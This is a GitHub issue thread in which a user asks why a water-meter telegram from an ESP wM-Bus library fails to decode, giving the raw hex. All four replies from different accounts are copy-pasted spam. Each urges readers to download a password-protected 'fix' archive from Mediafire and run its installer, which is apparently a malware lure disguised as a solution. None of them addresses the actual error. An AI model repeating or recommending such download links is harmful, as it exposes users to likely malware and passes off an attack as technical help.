### ISSUE TITLE
Error during readout, (010  ?: 97 unknown ci-field)

### ISSUE THREAD

**Issue by FrankDoersam** [maciekn/izar-wmbus-esp#3]
Hello everyone,
first of all, the library is really great, thank you very much! I get the answer from my water meter. When I try to extract it via wmbusmeters.org I get the error 010 ?: 97 unknown ci-field. What is the error here, have I forgotten something?

Thank you for your help!
Greetings
Frank

54 CD 2E 44 FA 12 4 94 16 23 0 7 35 E9 7A 9F 0 20 25 BB AC C3 94 F8 95 67 D5 3D 6 1B 94 E0 7F 4D DE C8 8A 12 ED 8 BC 83 7E B2 A1 7E 7 CB 4D EA B7 7C F 89 1C 1C B7 EE B6 ED EB 8E 7B 7B EF

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
